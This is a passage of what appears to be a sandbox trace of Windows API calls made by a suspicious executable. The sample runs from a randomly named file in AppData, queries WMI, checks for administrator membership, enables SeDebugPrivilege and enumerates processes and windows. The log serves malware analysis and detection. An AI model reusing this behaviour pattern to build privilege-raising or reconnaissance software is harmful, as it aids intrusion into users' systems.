| out: ppEnum=0x18a130*=0x5b3bcb4) returned 0x0 [0234.341] IUnknown:QueryInterface (in: This=0x5b3bcb4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x5b3bcb8) returned 0x0 [0234.341] IClientSecurity:QueryBlanket (in: This=0x5b3bcb8, pProxy=0x5b3bcb4, pAuthnSvc=0x18a044, pAuthzSvc=0x18a040, pServerPrincName=0x18a038, pAuthnLevel=0x18a03c, pImpLevel=0x18a02c, pAuthInfo=0x18a030, pCapabilites=0x18a034 | out: pAuthnSvc=0x18a044*=0xa, pAuthzSvc=0x18a040*=0x0, pServerPrincName=0x18a038, pAuthnLevel=0x18a03c*=0x6, pImpLevel=0x18a02c*=0x2, pAuthInfo=0x18a030, pCapabilites=0x18a034*=0x1) returned 0x0 [0234.341] IUnknown:Release (This=0x5b3bcb8) returned 0x1 [0234.341] IUnknown:QueryInterface (in: This=0x5b3bcb4, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189fe8 | out: ppvObject=0x189fe8*=0x7a1c9c) returned 0x0 [0234.341] IUnknown:QueryInterface (in: This=0x5b3bcb4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189fe4 | out: ppvObject=0x189fe4*=0x5b3bcb8) returned 0x0 [0234.341] IClientSecurity:SetBlanket (This=0x5b3bcb8, pProxy=0x5b3bcb4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.342] IUnknown:Release (This=0x5b3bcb8) returned 0x2 [0234.342] WbemLocator:IUnknown:Release (This=0x7a1c9c) returned 0x1 [0234.342] CoTaskMemFree (pv=0x7b57a8) [0234.342] IUnknown:QueryInterface (in: This=0x5b3bcb4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bd0 | out: ppvObject=0x189bd0*=0x7a1c9c) returned 0x0 [0234.342] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b8c | out: ppvObject=0x189b8c*=0x0) returned 0x80004002 [0234.343] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899ac | out: ppvObject=0x1899ac*=0x0) returned 0x80004002 [0234.343] WbemLocator:IUnknown:AddRef (This=0x7a1c9c) returned 0x3 [0234.343] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894ec | out: ppvObject=0x1894ec*=0x0) returned 0x80004002 [0234.343] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18949c | out: ppvObject=0x18949c*=0x0) returned 0x80004002 [0234.343] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894a8 | out: ppvObject=0x1894a8*=0x7a1bfc) returned 0x0 [0234.343] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a1bfc, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894b0 | out: pCid=0x1894b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.343] WbemLocator:IUnknown:Release (This=0x7a1bfc) returned 0x3 [0234.343] CoGetContextToken (in: pToken=0x189508 | out: pToken=0x189508) returned 0x0 [0234.343] CoGetContextToken (in: pToken=0x189910 | out: pToken=0x189910) returned 0x0 [0234.343] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899a0 | out: ppvObject=0x1899a0*=0x7a1c84) returned 0x0 [0234.344] WbemLocator:IRpcOptions:Query (in: This=0x7a1c84, pPrx=0x7a1c9c, dwProperty=2, pdwValue=0x1899c8 | out: pdwValue=0x1899c8) returned 0x80004002 [0234.344] WbemLocator:IUnknown:Release (This=0x7a1c84) returned 0x3 [0234.344] WbemLocator:IUnknown:Release (This=0x7a1c9c) returned 0x2 [0234.344] CoGetContextToken (in: pToken=0x189ee0 | out: pToken=0x189ee0) returned 0x0 [0234.344] CoGetContextToken (in: pToken=0x189e40 | out: pToken=0x189e40) returned 0x0 [0234.344] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1c9c, riid=0x189f10*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f0c | out: ppvObject=0x189f0c*=0x5b3bcb4) returned 0x0 [0234.344] IUnknown:AddRef (This=0x5b3bcb4) returned 0x4 [0234.344] IUnknown:Release (This=0x5b3bcb4) returned 0x3 [0234.344] IUnknown:Release (This=0x5b3bcb4) returned 0x2 [0234.344] IUnknown:Release (This=0x5b3bb94) returned 0x2 [0234.344] SysStringLen (param_1=0x0) returned 0x0 [0234.344] IEnumWbemClassObject:Reset (This=0x5b3bcb4) returned 0x0 [0234.344] CoTaskMemAlloc (cb=0x4) returned 0x7e1fe0 [0234.344] IEnumWbemClassObject:Next (in: This=0x5b3bcb4, lTimeout=-1, uCount=0x1, apObjects=0x7e1fe0, puReturned=0x27a55e4 | out: apObjects=0x7e1fe0*=0x0, puReturned=0x27a55e4*=0x0) returned 0x1 [0234.346] CoTaskMemFree (pv=0x7e1fe0) [0234.346] CoGetContextToken (in: pToken=0x18a028 | out: pToken=0x18a028) returned 0x0 [0234.346] WbemLocator:IUnknown:Release (This=0x7a1c9c) returned 0x1 [0234.346] IUnknown:Release (This=0x5b3bcb4) returned 0x0 [0234.374] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4c609be, dwData=0x0) returned 1 [0234.381] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x189fa4 | out: lpmi=0x189fa4) returned 1 [0234.383] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x90101b1 [0234.389] GetDeviceCaps (hdc=0x90101b1, index=12) returned 32 [0234.389] GetDeviceCaps (hdc=0x90101b1, index=14) returned 1 [0234.389] DeleteDC (hdc=0x90101b1) returned 1 [0234.393] GetUserObjectInformationA (in: hObj=0x48, nIndex=1, pvInfo=0x27a64a0, nLength=0xc, lpnLengthNeeded=0x18a178 | out: pvInfo=0x27a64a0, lpnLengthNeeded=0x18a178) returned 1 [0234.394] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x434 [0234.507] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", nBufferLength=0x105, lpBuffer=0x189c6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", lpFilePart=0x0) returned 0x39 [0234.520] GetCurrentProcess () returned 0xffffffff [0234.520] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a160 | out: TokenHandle=0x18a160*=0x454) returned 1 [0234.528] GetTokenInformation (in: TokenHandle=0x454, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18a15c | out: TokenInformation=0x0, ReturnLength=0x18a15c) returned 0 [0234.528] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7e20e0 [0234.528] GetTokenInformation (in: TokenHandle=0x454, TokenInformationClass=0x8, TokenInformation=0x7e20e0, TokenInformationLength=0x4, ReturnLength=0x18a15c | out: TokenInformation=0x7e20e0, ReturnLength=0x18a15c) returned 1 [0234.530] LocalFree (hMem=0x7e20e0) returned 0x0 [0234.531] DuplicateTokenEx (in: hExistingToken=0x454, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18a164 | out: phNewToken=0x18a164*=0x450) returned 1 [0234.531] CheckTokenMembership (in: TokenHandle=0x450, SidToCheck=0x27ae9c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18a174 | out: IsMember=0x18a174) returned 1 [0234.531] CloseHandle (hObject=0x450) returned 1 [0234.536] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x189adc | out: lpLuid=0x189adc*(LowPart=0x14, HighPart=0)) returned 1 [0234.545] GetCurrentProcess () returned 0xffffffff [0234.545] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x189ad8 | out: TokenHandle=0x189ad8*=0x450) returned 1 [0234.545] AdjustTokenPrivileges (in: TokenHandle=0x450, DisableAllPrivileges=0, NewState=0x27aee60*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0234.546] CloseHandle (hObject=0x450) returned 1 [0234.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36c72b0, Length=0x20000, ResultLength=0x18a1bc | out: SystemInformation=0x36c72b0, ResultLength=0x18a1bc*=0x8780) returned 0x0 [0234.577] EnumWindows (lpEnumFunc=0x4c60a36, lParam=0x0) returned 1 [0234.578] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.578] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.578] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.578] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.579] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.579] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.579] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.580] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.580] GetWindowThreadProcessId (in: hWnd=0x5014c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.580] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.580] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.581] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.581] GetWindowThreadProcessId (in: hWnd=0x300c2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.581] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.581] GetWindowThreadProcessId (in: hWnd=0x20146, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.581] GetWindowThreadProcessId (in: hWnd=0x40022, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.581] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.581] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.581] GetWindowThreadProcessId (in: hWnd=0x2010c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.581] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.581] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.581] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.582] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.582] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.582] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.582] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.582] GetWindowThreadProcessId (in: hWnd=0x300a2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.582] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x564 [0234.582] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.582] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x538 [0234.582] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.582] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x504 [0234.583] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.583] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.583] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.583] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.583] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.583] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.583] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.583] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.583] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.583] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x44c [0234.584] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.584] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.584] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.584] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.584] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.584] GetWindowThreadProcessId (in: hWnd=0x60154, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.584] GetWindowThreadProcessId (in: hWnd=0x20140, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.584] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.584] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.584] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.585] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.585] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.585] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.585] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.585] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.585] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.585] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.585] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.586] EnumWindows (lpEnumFunc=0x4c60a5e, lParam=0x0) returned 1 [0234.586] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.586] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.586] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.586] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.587] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.587] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.587] GetWindowThreadProcessId (in: hWnd=0x5014c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.588] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x300c2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.588] GetWindowThreadProcessId (in: hWnd=0x20146, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.588] GetWindowThreadProcessId (in: hWnd=0x40022, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.588] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.588] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.589] GetWindowThreadProcessId (in: hWnd=0x2010c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.589] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.589] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.589] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.589] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.589] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.589] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.589] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.589] GetWindowThreadProcessId (in: hWnd=0x300a2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.589] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x564 [0234.590] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.590] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x538 [0234.590] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.590] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x504 [0234.590] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 